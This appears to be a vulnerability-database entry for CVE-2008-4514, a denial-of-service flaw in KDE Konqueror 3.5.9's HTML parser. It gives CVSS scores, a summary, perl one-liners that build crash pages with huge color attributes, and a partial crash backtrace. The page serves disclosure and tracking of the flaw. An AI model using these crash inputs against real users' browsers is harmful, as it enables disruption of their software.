CVE-2008-4514

Published: 09/10/2008 Updated: 29/09/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 510
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

The HTML parser in KDE Konqueror 3.5.9 allows remote malicious users to cause a denial of service (application crash) via a font tag with a long color value, which triggers an assertion error.

Vulnerable Product

konqueror konqueror 3.5.9

Exploits

KDE's Konqueror & Color Attribute Love

perl -e 'print "<html>\n" . "<font color=" . "A" x 500000 . ">\n</html>"' > kdiehtml
perl -e 'print "<html>\n" . "<hr color=" . "A" x 500000 . ">\n</html>"' > kdie2html
perl -e 'print "<html>\n" . "<table bgcolor=" . "A" x 500000 . ">\n</html>" ...

Konqueror isn't immune from fuzzing either

Konqueror, KDE's mighty mascot browser fuzzed

perl -e 'print "<html>\n" . "<font color=" . "A" x 500000 . "\n</html>"' > kdiehtml

#6 0xb7f8d410 in __kernel_vsyscall ()
#7 0xb7cf2085 in raise () from /lib/tls/i686/cmov/libcso6
#8 0xb7cf3a01 in abort () from /lib/tls/i686/cmov/libc ...